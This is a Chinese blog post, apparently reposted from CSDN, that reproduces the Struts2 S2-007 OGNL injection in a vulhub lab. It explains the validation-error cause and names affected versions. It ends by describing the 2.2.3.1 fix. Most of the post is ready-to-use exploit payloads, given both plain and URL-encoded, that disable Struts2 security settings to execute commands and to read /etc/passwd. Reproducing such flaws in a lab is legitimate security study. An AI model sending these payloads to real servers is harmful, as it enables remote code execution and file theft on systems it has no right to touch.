Struts2/S2-007

本文阅读 2 分钟

S2-007漏洞一般出现在表单处。当配置了验证规则 <ActionName>-validation.xml时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似单引号拼接的方式即可注入任意 OGNL 表达式。

例如这里有一个 UserAction:

public class UserAction extends ActionSupport { 
    private Integer age;
    private String name;
    private String email;

然后配置有 UserAction-validation.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
    "-//OpenSymphony Group//XWork Validator 1.0//EN"
    "http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
    <field name="age">
        <field-validator type="int">
            <param name="min">1</param>
            <param name="max">150</param>
        </field-validator>
    </field>
</validators>

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 “’”+ value + "’"然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助单引号拼接的方式即可注入任意 OGNL 表达式。

影响版本
2.0.0 - 2.2.3
docker-compose build
docker-compose up -d
访问:ip:8080

3.1、利用方式一

绕过安全配置进行命令执行的 Payload

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app")) + '

即为:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40java.lang.Runtime%40getRuntime().exec(%22open%20%2FApplications%2FCalculator.app%22))%20%2B%20%27

文件读取:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2b%20%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%23w%3Dnew%20java.io.File%28%22%2fetc%2fpasswd%22%29%2C@org.apache.commons.io.IOUtils@toString%28new%20java.io.FileInputStream%28%23w%29%29%29%20%2b%20%27

即为:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,#w=new java.io.File("/etc/passwd"),@org.apache.commons.io.IOUtils@toString(new java.io.FileInputStream(#w))) + '

命令执行:

/user.action?name=looke&email=qq@qq.com&age=%27%20%2b%20%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%20%2f%27%29.getInputStream%28%29%29%29%20%2b%20%27

即为:

/user.action?name=looke&email=qq@qq.com&age=' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

struts2.2.3.1 对这个漏洞进行了修复,修复方法:类似于 sql 注入的 addslashes,对其中的单引号进行了转义,在 getOverrideExpr函数中进行了 StringEscape,从而无法闭合单引号,也就无法构造 OGNL 表达式。

参考链接:https://github.com/vulhub/

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/sycamorelg/article/details/117567176
-- 展开阅读全文 --
Web安全—逻辑越权漏洞(BAC)
« 上一篇 03-13
Redis底层数据结构--简单动态字符串
下一篇 » 04-10

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复